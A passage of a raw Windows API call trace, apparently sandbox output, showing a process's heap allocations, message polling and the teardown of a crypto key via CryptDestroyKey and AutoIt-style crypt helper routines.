wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0200.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0200.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0200.652] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0200.652] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0200.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0200.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0200.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.653] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0200.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0200.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50860, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0200.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.654] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0200.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0200.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0200.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0200.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0200.654] CryptDestroyKey (hKey=0xa87590) returned 1 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0200.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0200.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0200.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0200.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0200.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0200.655] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.656] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.656] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0200.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0200.656] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0200.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0200.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0200.657] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0200.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0200.658] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.658] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0200.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.658] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.659] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0200.659] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0200.659] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.659] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0200.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.661] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.661] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.661] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0200.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.695] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 